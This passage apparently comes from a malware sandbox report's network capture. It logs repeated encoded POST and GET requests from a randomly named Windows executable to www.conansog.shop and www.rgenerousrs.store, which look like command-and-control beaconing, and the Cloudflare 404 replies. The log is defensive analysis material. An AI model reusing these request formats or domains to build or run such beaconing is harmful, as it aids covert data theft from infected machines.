                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.conansog.shop
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Origin: http://www.conansog.shop
                                                    Referer: http://www.conansog.shop/us5e/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 7a 31 59 39 79 6b 64 41 66 58 6b 48 42 6c 6b 37 36 6f 31 43 55 35 65 74 47 47 44 73 53 74 65 78 31 38 49 71 73 48 73 54 61 49 74 62 34 61 4d 45 76 32 4d 61 69 38 63 44 56 2b 4e 6b 4c 45 6b 6a 79 67 42 31 4f 59 6d 58 37 72 75 57 79 37 70 41 5a 72 4a 32 4a 4b 6a 5a 54 30 68 6b 44 32 47 33 6c 30 4f 6f 53 63 46 32 42 55 47 7a 70 6c 6c 72 68 39 6b 56 35 35 38 4f 62 33 72 34 79 46 74 6d 4e 5a 51 6d 58 74 42 39 76 71 79 53 58 6e 36 53 68 48 76 6d 61 6f 4e 50 6b 6b 6f 55 68 43 45 46 6e 41 42 4a 70 67 2b 6c 70 31 41 78 75 6d 68 7a 59 56 52 67 2b 4f 41 76 30 77 4e 4c 6b 69 58 34 48 6f 63 62 67 50 43 78 51 32 6a 48 57 57 2f 44 68 79 71 7a 4e 54 4b 75 79 37 48 38
                                                    Data Ascii: StWXF0Jx=z1Y9ykdAfXkHBlk76o1CU5etGGDsStex18IqsHsTaItb4aMEv2Mai8cDV+NkLEkjygB1OYmX7ruWy7pAZrJ2JKjZT0hkD2G3l0OoScF2BUGzpllrh9kV558Ob3r4yFtmNZQmXtB9vqySXn6ShHvmaoNPkkoUhCEFnABJpg+lp1AxumhzYVRg+OAv0wNLkiX4HocbgPCxQ2jHWW/DhyqzNTKuy7H8
                                                    Nov 21, 2024 16:17:51.562854052 CET736INHTTP/1.1 404 Not Found
                                                    Date: Thu, 21 Nov 2024 15:17:51 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WuhUt7DYBU0dRmqFdJA8ZFy%2F%2FaDOfBq4mEYLQIxZT87ZgH3liJzegK9uYdtu1tEJEaJLzzsDh178IoWzk9i5x8z92YyJIsOqFgCoigIh1sEW8WbdU30QVDponseqWNfgzaBhyg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e61a6238ad58cb3-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2057&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=806&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.549979104.21.41.74806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:17:52.938513041 CET1823OUTPOST /us5e/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.conansog.shop
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Origin: http://www.conansog.shop
                                                    Referer: http://www.conansog.shop/us5e/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 7a 31 59 39 79 6b 64 41 66 58 6b 48 42 6c 6b 37 36 6f 31 43 55 35 65 74 47 47 44 73 53 74 65 78 31 38 49 71 73 48 73 54 61 49 6c 62 34 4a 30 45 70 6c 55 61 6a 38 63 44 57 2b 4e 6c 4c 45 6c 35 79 6a 78 4c 4f 59 61 70 37 74 79 57 39 35 78 41 66 5a 78 32 48 4b 6a 5a 52 30 68 6c 65 47 48 74 6c 30 2f 41 53 61 6c 32 42 55 47 7a 70 6e 4e 72 6c 76 4d 56 37 35 38 4e 63 33 72 4f 32 46 74 65 4e 5a 34 59 58 74 4e 4c 76 5a 36 53 58 48 71 53 6b 31 33 6d 53 6f 4e 42 6a 6b 70 52 68 43 5a 66 6e 41 63 79 70 67 61 50 70 31 49 78 74 77 38 4a 45 6b 64 69 39 50 34 4f 35 68 41 6f 37 33 37 74 46 4b 59 37 72 34 57 6e 66 33 4c 56 47 53 48 2b 31 52 36 37 58 79 32 45 2f 50 58 39 58 76 69 79 34 50 62 6f 37 70 47 30 79 6b 38 50 42 49 35 7a 30 37 64 32 33 47 55 51 75 2f 4e 57 48 68 64 6f 66 68 67 44 38 36 57 59 31 33 49 76 43 71 6e 46 75 6b 31 72 74 34 70 56 71 44 66 2f 49 54 36 63 6b 4d 44 50 4d 68 54 6e 69 52 6d 70 43 6e 4f 41 42 69 43 35 42 4f 4f 62 65 54 73 71 41 6d 52 69 79 5a 6f 68 45 37 71 62 68 [TRUNCATED]
                                                    Data Ascii: StWXF0Jx=z1Y9ykdAfXkHBlk76o1CU5etGGDsStex18IqsHsTaIlb4J0EplUaj8cDW+NlLEl5yjxLOYap7tyW95xAfZx2HKjZR0hleGHtl0/ASal2BUGzpnNrlvMV758Nc3rO2FteNZ4YXtNLvZ6SXHqSk13mSoNBjkpRhCZfnAcypgaPp1Ixtw8JEkdi9P4O5hAo737tFKY7r4Wnf3LVGSH+1R67Xy2E/PX9Xviy4Pbo7pG0yk8PBI5z07d23GUQu/NWHhdofhgD86WY13IvCqnFuk1rt4pVqDf/IT6ckMDPMhTniRmpCnOABiC5BOObeTsqAmRiyZohE7qbh8hVxSTNV36e2r8IJf2Lzl2wW+9wBLpq1AoakgizXmoCJgQfBGUXIkAJyXDkNDQd9d7DRVs+NI3JTj+VDXK46SCgMUA0ndpdMdeW5XQtCq+c6vT5Hiw3uad59JJoTq6EiGYJSIM/qkJGWTN3GL4RzSh26/l+lyOmf+00xPtJKKoo+xMGtAg3tSSjPe239VE9SEUD481X+YmymNmsJgZqKRn8WVA4xWdc9wzMNzU/gBrLA0rR96bWWvxMHlVtIa5BADG7y5wksGmHOD+csImzAo+mGXD/RIei+nZwVA34B5K8wShwZr0jfgxFSxJ4/9NSxJDjmt86ttYJZbtLaG0WjawA9xWchIxxgvqJMOCSRv7E5FogoSg3uFstKO4PA4+83Jw9t4/IjeQrRjRBppQi9NM6yyeu6IxQsMZgEMWZHPIZGgB5KOH3ZV2jAYIDypt98zz2xsWc1O9W09WIIv+cor3vA8JjSGfsNrLzK8p+KRsBW9UNR15kMb0kek11ud29Helmf0zNR3Ncp+zEYe8/3ucQhMU9Hqr8siJ9HcSqoQYcWXTjQbA4fVPS7MeIdbFBbrM0mUzKtn6cxniZy3qST+5J1X1GVQh0qrAdfKG9X4cdKV0YUsNDyVBZxuS8AhSmCUiqxF3Fbud8LnJezRNy1wz0LKYCBHrdjOu [TRUNCATED]
                                                    Nov 21, 2024 16:17:54.262159109 CET739INHTTP/1.1 404 Not Found
                                                    Date: Thu, 21 Nov 2024 15:17:54 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BafI9j%2Bi%2Bvv10noNw6twKzYlabLpFLXV78H6cws9FqUCn%2BCbeURGInbCNCDNRmd7yE1zjuC9DZrfROQtwVzaqhW3mJ0zyPmFGn5yMk5MxZU50e0jtl5pkk4wA75aBNk53jqJEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e61a6341e921899-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1660&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1823&delivery_rate=0&cwnd=162&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.549980104.21.41.74806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:17:55.592168093 CET528OUTGET /us5e/?StWXF0Jx=+3wdxQ15dA0PRlxlyKsnTLOlEhuFd9nhpeMIpGJhTalb6rEI4lQ5upkBauNLLCI1kwggOdPP7drS+cJ7ELELPajCaX5eVWqFhVj1FJt4Lm6snm9lne8G6LEoCHfH0EAuWA==&zfI=jXEDeV4Xp62 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US
                                                    Host: www.conansog.shop
                                                    Connection: close
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Nov 21, 2024 16:17:56.786237001 CET740INHTTP/1.1 404 Not Found
                                                    Date: Thu, 21 Nov 2024 15:17:56 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LMkEzQI3WwZNrbhPOGAym1Zx0McZ610w0j8HbV%2BSmtvft%2B8adHQSVXd20DYSLi2%2Bza7abWPfvzoLcEwRKoXGx5%2Fb2NV80zjmGL3K6ogyPSqV5SoPQwfKO2NbtT74YMzwAxTe8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e61a6444f94c42c-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1625&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=528&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.549981172.67.167.146806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:18:02.336956024 CET798OUTPOST /zr8v/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.rgenerousrs.store
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Origin: http://www.rgenerousrs.store
                                                    Referer: http://www.rgenerousrs.store/zr8v/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 42 6e 52 41 61 38 32 53 65 64 76 41 61 69 43 64 68 68 61 42 63 30 31 62 62 36 56 72 36 5a 71 64 42 6e 6b 33 39 74 76 35 4b 79 4d 42 66 67 30 42 58 35 46 50 58 4c 7a 68 2f 4d 72 76 39 47 74 72 49 55 2f 39 49 68 6d 73 5a 37 2b 30 76 4e 56 79 4b 5a 31 53 30 6c 51 79 6e 78 59 33 38 41 56 42 76 78 5a 67 51 6e 4b 45 50 38 42 54 37 46 36 5a 54 75 34 50 6c 70 6c 61 4c 77 4d 4b 62 46 46 45 32 50 46 48 6f 53 74 76 2f 6b 4c 50 62 33 59 77 52 47 4b 5a 38 63 55 71 61 34 4c 79 68 41 37 39 71 73 32 62 34 31 70 52 61 33 78 77 70 5a 6a 62 51 31 76 63 69 66 73 51 48 38 50 30 45 59 58 51 67 79 47 54 33 74 49 3d
                                                    Data Ascii: StWXF0Jx=BnRAa82SedvAaiCdhhaBc01bb6Vr6ZqdBnk39tv5KyMBfg0BX5FPXLzh/Mrv9GtrIU/9IhmsZ7+0vNVyKZ1S0lQynxY38AVBvxZgQnKEP8BT7F6ZTu4PlplaLwMKbFFE2PFHoStv/kLPb3YwRGKZ8cUqa4LyhA79qs2b41pRa3xwpZjbQ1vcifsQH8P0EYXQgyGT3tI=
                                                    Nov 21, 2024 16:18:03.856549978 CET1071INHTTP/1.1 404 Not Found
                                                    Date: Thu, 21 Nov 2024 15:18:03 GMT
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jz0EPEM%2BKj9v9tGOK3%2FVVwcGi%2BJ8vi6PJxAk6rK2fmtcNrtXz1yNwq2gQ8QLllVHsM3yk8cVH5NNbdNSyNJjl3o20P8m531h%2FtfHM9Q9BeSRF8Mbd2bmCdi35tKDUZqGBe9unVZy95o%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e61a66edd48726b-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1820&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=798&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.549982172.67.167.146806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:18:05.000088930 CET818OUTPOST /zr8v/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.rgenerousrs.store
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Origin: http://www.rgenerousrs.store
                                                    Referer: http://www.rgenerousrs.store/zr8v/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 42 6e 52 41 61 38 32 53 65 64 76 41 63 41 57 64 74 68 6d 42 4e 55 31 59 58 61 56 72 6a 4a 71 5a 42 6e 59 33 39 73 71 30 4b 47 67 42 66 46 51 42 57 34 46 50 55 4c 7a 68 77 73 72 71 77 6d 74 61 49 55 79 43 49 6a 79 73 5a 37 61 30 76 4a 46 79 4b 71 74 56 32 31 51 30 73 52 59 78 79 67 56 42 76 78 5a 67 51 6e 75 39 50 2f 78 54 37 31 71 5a 53 4d 63 4d 6d 70 6c 56 4d 77 4d 4b 66 46 46 41 32 50 46 68 6f 58 51 4b 2f 69 48 50 62 30 4d 77 51 53 57 61 32 63 55 6f 5a 49 4b 31 67 51 65 78 70 50 65 75 39 32 38 6d 44 46 6c 73 68 50 53 78 4b 58 6e 30 78 2f 41 6f 58 76 48 44 56 6f 32 35 36 52 57 6a 70 36 65 35 49 53 57 4c 52 2b 6b 79 41 7a 77 46 47 54 7a 4b 49 46 5a 6a
                                                    Data Ascii: StWXF0Jx=BnRAa82SedvAcAWdthmBNU1YXaVrjJqZBnY39sq0KGgBfFQBW4FPULzhwsrqwmtaIUyCIjysZ7a0vJFyKqtV21Q0sRYxygVBvxZgQnu9P/xT71qZSMcMmplVMwMKfFFA2PFhoXQK/iHPb0MwQSWa2cUoZIK1gQexpPeu928mDFlshPSxKXn0x/AoXvHDVo256RWjp6e5ISWLR+kyAzwFGTzKIFZj
                                                    Nov 21, 2024 16:18:06.541604042 CET1073INHTTP/1.1 404 Not Found
                                                    Date: Thu, 21 Nov 2024 15:18:06 GMT
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v7SJR5PAu6Nvu2bnzCicAlwpGdhkyLevVIMEU5XJeExmwCLPFp1x0g%2B46%2BQQ1bw6Hh%2BMVbTqYUZAXKCbWSAind3tHQR9Gh3vVcR%2BmlZMGNx%2BfFg002IverXm51rusheP8qRBNebqohs%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e61a67efcab0caa-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1737&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=818&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.549983172.67.167.146806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:18:07.658329010 CET1835OUTPOST /zr8v/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.rgenerousrs.store
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Origin: http://www.rgenerousrs.store
                                                    Referer: http://www.rgenerousrs.store/zr8v/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 42 6e 52 41 61 38 32 53 65 64 76 41 63 41 57 64 74 68 6d 42 4e 55 31 59 58 61 56 72 6a 4a 71 5a 42 6e 59 33 39 73 71 30 4b 47 6f 42 66 7a 63 42 57 62 39 50 62 72 7a 68 35 4d 72 72 77 6d 74 39 49 55 71 4f 49 6a 50 62 5a 35 79 30 75 75 74 79 62 4c 74 56 2f 31 51 30 6a 78 59 30 38 41 56 75 76 78 4a 73 51 6e 2b 39 50 2f 78 54 37 33 43 5a 56 65 34 4d 71 4a 6c 61 4c 77 4d 57 62 46 46 6b 32 50 4d 55 6f 57 42 2f 2f 53 6e 50 62 53 73 77 54 68 2b 61 77 4d 55 6d 63 49 4b 58 67 51 6a 7a 70 4f 79 55 39 31 67 4d 44 48 31 73 69 71 6e 4c 5a 32 37 35 72 4a 59 71 56 59 44 36 4a 50 76 63 2f 53 71 4e 73 4b 53 43 4d 32 43 2f 48 36 42 71 49 54 6c 77 54 53 4c 2b 41 69 70 69 63 33 53 49 4a 31 34 7a 67 4e 78 72 54 53 52 74 34 74 4a 6d 72 4d 7a 42 76 30 69 61 32 6a 73 6a 79 6c 39 57 37 63 57 37 42 75 4d 57 31 42 77 36 44 62 41 35 75 33 74 45 30 38 72 6b 77 50 57 57 45 32 61 31 42 76 35 69 4e 6c 6d 4e 74 65 52 54 63 52 43 68 45 33 33 58 30 39 73 77 63 77 64 49 54 4c 53 55 63 6f 49 77 5a 56 47 32 35 [TRUNCATED]
                                                    Data Ascii: StWXF0Jx=BnRAa82SedvAcAWdthmBNU1YXaVrjJqZBnY39sq0KGoBfzcBWb9Pbrzh5Mrrwmt9IUqOIjPbZ5y0uutybLtV/1Q0jxY08AVuvxJsQn+9P/xT73CZVe4MqJlaLwMWbFFk2PMUoWB//SnPbSswTh+awMUmcIKXgQjzpOyU91gMDH1siqnLZ275rJYqVYD6JPvc/SqNsKSCM2C/H6BqITlwTSL+Aipic3SIJ14zgNxrTSRt4tJmrMzBv0ia2jsjyl9W7cW7BuMW1Bw6DbA5u3tE08rkwPWWE2a1Bv5iNlmNteRTcRChE33X09swcwdITLSUcoIwZVG25+QLAAF1tSZbGEm6Ledo/a6sJ2dsOoM3A1SBPLunnDQVT1u1dmY5bpuEYnXghz9wiYji2KzHBr5c25VZKREOGyeI9IuyKj7jzdQm/XQcmmLHiRZ8ZrZxCmSC9XSizVltTx9TQ2WuOGb/O6L4lndpe8pI7gGaQUDZdO34F9cnCOZMdKHC+jyAl1yJqEfmaATQ9TdIU/JG63IWwBZIs71eRohtXCAQscpBIcgySYZYHv1gQ7D7coDmu04ITv5NTqjFQBG99XLMdaZ5n64I8tz+hlwMa7uHM596sdH1+vsulQFC5L1tt5+QSKijYSsEgE+P3H88B52FnUeQ3J4VQvpzPW3c5wYv0119Br7QT1//W6FcN75Q1uFbkeobcSx9TG8pyV4/r2EpLxeIBBwWGdlN4BruYXmIfGe+lIJtbmEeToKogs5awjl8oYjuAXxQH3cX7v3oc4Q5ediXQxSBmDOaTqov9Dzr9a8rb35zya6lEjZVNTga0GhY2Ieej2aEvh+v+OaqTffDoUSf5EzJA6Cgj5sIbmayWxLjvo3ljnWNAMtH1tBpftZIGFCYPPz4o5BOO7aOcqH7ot/a82j7Q7kpRap8aFY3EV5GabK8HTS1F1abdNNkNMPUfdhx3I0+uRyNMlC4YWdpLwPtSV46KJ7Q5M1rfUBY8f5LUwl [TRUNCATED]
                                                    Nov 21, 2024 16:18:09.181600094 CET1071INHTTP/1.1 404 Not Found
                                                    Date: Thu, 21 Nov 2024 15:18:09 GMT
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z218R7hiMB%2FYE5GRs6PzgTsug9LauZH6l7NfPiZmk1pwEO2zIcMHtaDTijsKGS57hvq6rfdpXZL2jz6LMNizXemOOukA4fV3aU1Y5ayEvimSSCBHYCG6ax6aYeBoDqNDgPFqvpCu9o0%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e61a6901ae743a4-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2248&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1835&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.549984172.67.167.146806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:18:10.330718994 CET532OUTGET /zr8v/?zfI=jXEDeV4Xp62&StWXF0Jx=Ml5gZJW5QcanJzzDoQq3UEdCVeZH9JbjcVoAzcC8IkgnBjkPfLtOabWm5tXm+g1ABEyKJ0nQQaWBnIlmZ5M263kDoloi41FTqGteT0eMG8ZHw0bPQeAXlqBGUQENUFkujA== HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US
                                                    Host: www.rgenerousrs.store
                                                    Connection: close
